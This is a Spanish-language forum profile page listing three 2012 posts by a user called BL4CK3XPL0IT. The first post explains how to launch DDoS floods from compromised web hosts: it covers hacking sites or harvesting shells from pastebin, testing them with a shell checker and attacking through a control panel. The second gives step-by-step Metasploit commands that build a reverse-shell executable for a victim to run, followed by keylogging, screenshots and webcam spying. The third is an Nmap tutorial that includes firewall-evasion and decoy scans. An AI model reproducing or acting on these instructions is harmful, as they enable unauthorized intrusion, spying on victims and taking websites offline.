BL4CK3XPL0IT

Usuario (Estados Unidos)

Primer post: 29 jun 2012Último post: 7 jul 2012

Posts

Puntos totales

Comentarios

InfoporAnónimo7/7/2012

¿Te Gustaría Dejar Off Cualquier Sitio Web con un Click? Si tu respuesta es SI, entonces esto te interesara Antes de empezar con esto, quiero resaltar que esta entrada la escribiré con el fin de satisfacer a algunos amigos/compañeros y usuarios, la cual me han estado insistiendo que escriba sobre los ataques DDoS que brindo a algunos clientes que compran acceso a mi sistema de ataques. La entrada tratara sobre como realizar ataques DDoS hacia servidores webs, con una herramienta que actualmente no es muy conocida en Latino America y es totalmente privada. Ahora bien, empecemos con el concepto de DDoS según WikiPedia: En seguridad informática, un ataque de denegación de servicio, también llamado ataque DoS (de las siglas en inglés Denial of Service), es un ataque a un sistema de computadoras o red que causa que un servicio o recurso sea inaccesible a los usuarios legítimos. Normalmente provoca la pérdida de la conectividad de la red por el consumo del ancho de banda de la red de la víctima o sobrecarga de los recursos computacionales del sistema de la víctima. Métodos de Ataque: - SYYN - UDP - ICMP Conociendo el pequeño concepto de los Ataques DDoS y algunos métodos sobre ello, ya procederemos a realizar dicho ataque. Pero algunas personas para poder realizar dicho ataque lo primero que hacen es ir a google y escribir: programas DDoS la cual google les arrojara una lista de programas que realizan dichos ataques, pero ninguna funciona. Entonces como el programita DDoS no les funciona, buscaran otros métodos, por lo que se encuentran con Botnets, entonces descargan dicha Botnet, la configuran y empiezan a infectar como locos... Algunas Botnets son efectivas, siempre y cuando tenga una cantidad mayor de bots, como por ejemplo si desean atacar un sitio grande, maximo tienen que tener 2 mil bots a mas... pero si desean un sitio pequeño maximo 500 bots, dependiendo que tan poderosa sea la Botnet... Entonces, en estos tiempos a la gente le aburre estar infectando, haciendo Ing. Social para que ejecuten su "malware", spammeando o estan todo el dia en una PC para conseguir unos 20 bots... que no les servira para nada... Pero bueno como vos sos inteligente... haras eso? perderás tu tiempo usando troyanitos o alguna botnet? estaras sentado todo el dia en una pc infectando? YO CREO QUE PIERDEN SU TIEMPO USANDO ESAS COSAS... Pero si vos sos tan paciente o te gusta estar rogando a las personas para que ejecuten tu malware, podes dejar de leer esto... pero si crees que no todo esta perdido podes seguir leyendo este hilo... Continuando con el tema... si eres de esas personas que han atacado a un sitio web con Botnet o algún programa DDoS y no han logrado su objetivo y/o piensan que es todo lo que pueden hacer.. pues estan totalmente equivocados porque esta vez les enseñare otro metodo mas actual para que puedan dejar off cualquier sitio web, asi tengan proteccion DDoS.. ¿Increible no? Este método trata de realizar los ATAQUES DESDE SERVIDORES WEBS (HACKEDS HOST) ¿No entiendes? Te explico... mira este link: http://secuity2.hostingfire.org/ddos.php Se que alguna vez lo has visto por ahi y es antiguo... pero como vos sabras es una herramienta para realizar ataques DDoS desde paginas webs (servidores) Entonces si yo ataco a una web desde esa herramienta... el ataque sera simple y no hara mucho efecto el ataque, por lo tanto otra vez estaremos fracasando... Pero... ¿No se te ocurre nada? ¿No? Pues.. a mi SI, te explico.. Como ya vistes el ataque desde la pagina web esa... sabemos que nosotros no estamos atacando, osea me refiero a nuestra ip... la cual cuando enviaremos el ataque a cualquier web, en los logs aparecera la IP de la pagina web mas no la nuestra... por lo tanto estamos protegiendo nuestra IP del ataque... Pero como vemos que con un solo ataque desde la pagina web esa no lograremos nada... entonces haremos esto. Sabemos que tenemos para atacar desde esta web: http://secuity2.hostingfire.org/ddos.php Por lógica sabremos que estamos enviando unos 5 MB de ataque porque solo es un host... Entonces si queremos que el ataque sea mucho mas fuerte y poderoso, tenemos que tener muchas paginas webs con la misma herramienta o alguna otra pero que realice el mismo funcionamiento de ataques... Ejemplo: 1 host = 5 MB DE ATAQUE 1000 host = 1GB - 2GB Conociendo dicho ejemplo, ya sabemos que tenemos que conseguir mas host para subir nuestra herramienta DDoS.. Pero te preguntaras... ¿Como consigo tantos Host? Pues, te pones a "hackear" sitios webs... con uno que hackees ya podras entrar a muchos... haciendole symlink o rooteando el server... como maximo puedes sacar unos 200 host en una sola web... O si no sabes "hackear" webs y queres algo mas facil... entras a http://pastebin .com/ y en el cuadro de busqueda colocas una de estas: /x32.php /greenshell.php /shell.php /webdav / Encontraras muchas shells, de diferentes tipos, las cuales son: - GEST - POST - SLOWLORIS Por lo que obtendrás una larga lista de hackeds host con shell o con la herramienta DDoS ya subida... En una lista podremos encontrar unos 500 host con shells... entonces es logico que no todos estarán funcionando, pero para eso necesitamos una Shell Checker para comprobar cuales son las shells que estan funcionando o no. Teniendo la lista con las shells, la guardamos en un archivo .txt y abrimos la Shell Checker y la cargamos: Ahora le damos Start para comprobar cuales son las shells que estan funcionando. Como vemos, en este caso obtuvimos 12 Shells UDP funcionando, la cual procederemos a guardarla. Ok bien... teniendo ya muchos host con la herramienta DDoS, procederemos a realizar Ataques DDOs a cualquier sitio web... Pero te preguntaras.. ¿Como hago para atacar desde diferentes host a la misma vez? Muy fácil... me imagino que alguna vez usastes o usas alguna Botnet, por lo tanto sabes que tienes unos archivos php que se configuran para que todos los bots vayan a una sola DB, en este caso es bots.sql o db.sql Ahora bien, en este caso es lo MISMO, me refiero a la configuración... tenes que subir los archivos a tu hosting de PAGO, configuras todo, subes tu db.sql y listo. Configurado todo, entraras a tu panel, donde tendrás una opción que dice: ADD SHELL, por lo que ahi agregaras todas los host que tienes hackeado o con alguna herramienta DDoS... Ejemplo: http://feeds2.feedburner.com/alivingtruth/DRwH = 1 HACKED HOST Lo agregas a tu BASE DE DATOS: Por lo que tendras ya una SHELL ONLINE: Ahora solo te toca ir a UDP FLOOD para que puedas atacar con todas las shells que tengas agregadas. Una vez le des Initiate Attack, el sitio web a la que has atacado, automáticamente estará offline, siempre y cuando tengas muchas shells con la que puedas atacar... Y así ya no estarás como LOCO usando botnet, troyanos o algun programita que no te funcionaran... ¿No me crees? Mira este video, en la cual configuro los archivos y dejo OFF a http://www.backtrack-linux.org/ link: http://www.youtube.com/watch?feature=player_embedded&v=DDtMQYFJWEMNota: Para que funcionen los ataques, no agregues shells como la c99.php o alguna shell para "defacear" tenes que subir el archivo udp.php

Backdoor - Linux

LinuxporAnónimo6/29/2012

Backdoor - Linux 1)Abriremos la terminal: 2) Escribimos: msfpayload windows/meterpreter/reverse_tcp LHOST="aca ponemos nuestra ip privada sin las comillas. Ponemos en una terminal ifconfig y nos aparece nuestra ip privada " LPORT=4444 x > click.exe Apretamos enter y quedara guardado en en directorio home o aveces en desktop. 3) Abrimos msfconsole Para entrar ponen: cd /pentest/exploits/framework3 ./msfconsole 4) Escribimos: use exploit/multi/handler 5) Ahora ponemos: set LHOST "nuestra ip privada sin las comillas" 6)Ponemos: set LPORT 4444 7) Nos quedaria asi: 8) El archivo que habiamos creado en el paso (2) debera ser ejecutado por la victima, cuando la victima ejecute el programa iremos a msfconsole y escribiremos: exploit 10) Cuando la victima ejecute el programa y pongamos "exploit" nos dara acceso a su pc. Algunos comandos comunes para usar: keyscan_start <---- se iniciara un escaneo de las teclas que presione la victima y a donde entre para ver los datos pondremos keyscan_dump y nos mostrata todo lo que hizo. Screenshot <----- Le sacaremos una foto a su pantalla. Getsystem <---- creara una shell aparte para entrar a todos sus directorios poder borrar archivos ,crear , etc.... existen muchos más, espiar la web cam y millones de más comandos. Con el comando help te muestra más de 65 comandos para usar. ------------------------------------------------------------------------------------------------ #-------------------------------------------------------------------------------# root@Bl4ck3***:~# We're back # root@Bl4ck3***:~# - Designer By BlackExploit # root@Bl4ck3***:~# ..........Connecting Close...... # #------------------------------------------------------------------------------# ------------------------------------------------------------------------------------------------

Mapeo de redes con Nmap

LinuxporAnónimo7/6/2012

Introducción: Antes de comenzar, quiero resaltar que Zenmap es casi lo mismo que Nmap, la única diferencia es que Nmap es por consola y Zenmap tiene entorno grafico NMAP Zenmap NMAP (Network Mapper o Mapeador de Redes) es una herramienta para scannear puertos abiertos. Se diseño para explorar grandes redes, aunque funciona a perfecto también para hacer mapeos a equipos individuales. A demás de puertos, también dice que servicio lo utiliza y sus versiones. Otra de las cosas que suele mostrar es que filtros o cortafuegos tiene, y a veces hasta el sistema operativo que tiene el equipo entre otras docenas de cosas. Nmap es una herramienta que se usa mucho en auditorias de seguridad y a demás muchos la usan con fines delictivos. Lo primordial es su tabla de puertos con sus estados que son los siguientes: Closed: Cerrado Open: Abierto Filtred: Filtrado Unfiltred: No Filtrado Abierto significa que la aplicación en la máquina destino se encuentra esperando conexiones o paquetes en ese puerto. Filtrado indica que un cortafuego, filtro, u otro obstáculo en la red está bloqueando el acceso a ese puerto, por lo que Nmap no puede saber si se encuentra abierto o cerrado. Los puertos cerrados no tienen ninguna aplicación escuchando en los mismos, aunque podrían abrirse en cualquier momento. Los clasificados como no filtrados son aquellos que responden a los sondeos de Nmap, pero para los que que Nmap no puede determinar si se encuentran abiertos o cerrados. A lo largo de este tutorial se encontraran con parámetros en mayúsculas y minúsculas, es muy importante que los respeten ya que varia su función. Primeros pasos con Nmap Haremos un simple mapeo a una red e ip cualquiera, para saber que puertos tiene abiertos La sintaxis del comando seria así: NMAP En este caso no tenemos parámetros ya que es solo un simple mapeo a la IP para observer los puertos abiertos. Tambien podemos scannear puertos que nosotros queramos, para ello con el parámetro –p colocamos los puertos separándolos por coma Sintaxis del comando: Nmap –p Ejemplo: Nmap –p 80,135,2000, 8080 192.168.1.3 Ahora bien, si queremos ver el sistema operativo que tiene el equipo seria así: Nmap –O Como se puede ver en el scanneo dice que resulta poco fiable la obtención del sistema operativo por qué no se encontró al menos un puerto abierto o cerrado del sistema operativo. Pero que según el Scanneo puede ser alguno de estos: Running: Microsoft Windows 2000|XP|2003 Ahora les voy a mostrar algo que suele ocurrir no muy frecuente, pero que si es probable que les pase. Al tirar un mapeo a una pc a la cual no logre identificar su sistema operativo. Pero que es esa cadena de texto dentro de TCP/IP Fingerprint…? TCP/IP fingerprint: OS:SCAN(V=5.59BETA1%D=12/30%OT=21%CT=1%CU=30523%PV=Y%DS=1%DC=D%G=Y%M=0015F2 OS:%TM=4EFDC93D%P=i686-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=109%TI=Z%CI=Z%II=I OS:%TS=8)OPS(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O OS:5=M5B4ST11NW6%O6=M5B4ST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6 OS:=3890)ECN(R=Y%DF=Y%T=40%W=3908%O=M5B4NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=3890%S=O%A=S+%F=AS%O=M5B4ST OS:11NW6%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T= OS:40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0 OS:%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=1 OS:64%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Esa cadena es a lo que se llama Huella TCP/IP. NMAP reconoce a un sistema operativo porque cada uno responde de una forma diferente. En este caso nos muestra esa cadena de texto por qué no logro identificarlo con exactitud. Ahora veremos hosts activos en una red. Para ello debemos saber la puerta de enlace. En mi caso es 192.168.1.1. Como sabemos, una red puede alojar máximo 255 hosts. Lo que haremos será un ping scan para saber cuántos hosts hay en mi red. Asi que el comando sería el siguiente: Nmap –sP 192.168.1.1-255 Veremos un listado como el de la imagen, el cual nos mostrara IPs, MAC, etc… Puertos y Servicios Ahora scannearemos un host, veremos sus puertos, servicios y la versión de sus servicios para saber si se pueden o no explotar. Tipeamos lo siguiente: nmap –sV Como se puede ver en la imagen, hay servicios activos en sus respectivos puertos, y en caso de existir un Exploit para explotar dicho servicio, se podría vulnerar y entrar a la pc. Los comandos se pueden combinar como en el siguiente ejemplo: Nmap –sV –O (Para sacar Servicios, versiones y sistema operativo) También podemos encontrarnos con Firewalls. Y nmap cuenta con comandos para evadirlos. Uno de ellos es –f La línea de comando nos quedaría asi: Nmap –sV –O –f (Para scannear puertos, servicios, versiones y sistema operativo de forma invisible) Y el resultado sería igual a la imagen anterior. Como venimos viendo no existe un parámetro mejor o peor que otro, ya que cada uno de ellos realiza tareas distintas. Yo les acabo de mostrar los más usuales y ahora veremos que a demás de colocar la ip, también podemos colocar un dominio. por ejemplo: nmap antrax-labs.org Evasion de Firewalls [Stealth Scans] Nmap cuenta con comandos para evadir Firewalls que no estén bien configurados. Los parámetros para esto son: -sX (Stealth Xmas Tree Scan, este tipo de scan envía paquetes con los flag FIN, URG, y PUSH activados) -sN (Stealth, Null Scan, este tipo de scan pone en off todos los flags) -sF (Stealth FIN Scan, este tipo de scan usa paquetes con el flag FIN activado para las pruebas) El resultado sera el mismo al scanneo de peurtos normal. Realiza el scanneo evadiendo el Firewall y muestra los servicios activos y en que puertos están funcionando. Otro parámetro útil es el -P0, lo que hace este parámetro no enviar ping al objetivo antes del scanneo. De esta manera, el Firewall no bloquea el scanneo. Exportar Resultados de Scanneos Nmap permite exportar scanneos en formato *.TXT o *.XML Los parámetros para ello son: -oN (txt) –oX (xml) La sintaxis seria: nmap –sV 192.168.1.1 –oN Desktop/test.txt Y el texto en este caso quedaría en el Desktop y se vería así: # Nmap 5.59BETA1 scan initiated Thu Jan 5 20:14:06 2012 as: nmap -sV -oN Desktop/test.txt 192.168.1.1 Nmap scan report for 192.168.1.1 Host is up (0.083s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 80/tcp open http TP-LINK WR740N WAP http config 1900/tcp open upnp TP-LINK TL-WR740N WAP UPnP 1.0 (ipos 7.0; UPnP 1.0) 49152/tcp open unknown 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : SF-Port49152-TCP:V=5.59BETA1%I=7%D=1/5%Time=4F062EC6%P=x86_64-unknown-linu SF:x-gnu%r(FourOhFourRequest,52,"HTTP/1.1x20404x20Notx20FoundrnConne SF:ction:x20closernDate:x20Fri,x2006x20Janx202012x2007:14:10x20GM SF:Trnrn")%r(GetRequest,52,"HTTP/1.1x20404x20Notx20FoundrnConnec SF:tion:x20closernDate:x20Fri,x2006x20Janx202012x2007:14:10x20GMT SF:rnrn")%r(SIPOptions,44,"HTTP/1.1x20501x20UnimplimentedrnConnec SF:tion:x20closernContent-Length:x200rnrn"); MAC Address: D8:5D:4C:C7:DC:EE (Tp-link Technologies Co.) Service Info: Device: WAP Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . # Nmap done at Thu Jan 5 20:15:46 2012 -- 1 IP address (1 host up) scanned in 100.25 seconds Despistando al Host con un señuelo (Decoy Scan) Esto sirve de alguna forma para anonimizar el scanneo. Hace creer al host que lo scannean otros hosts que no es el nuestro. Sintaxis de parámetros: nmap –sV –D , Ejemplo: nmap –sV –D 192.168.1.77,192.168.1.211 192.168.1.1 Y en ese caso, pensara que el que scannea es el host 192.168.1.77 y el 192.168.1.211 El resultado del scanneo sera el mismo al de Puertos y Servicios por el parametro -sV Puertos TCP y UDP Nmap permite filtrar puertos TCP y UDP. Los parámetros para ellos son: TCP: -sT UDP: -sU Existen otros parámetros, que en este paper no explique, pero si les dejo junto a este paper una imagen que contiene todos los parámetros con una breve descripción de cada uno.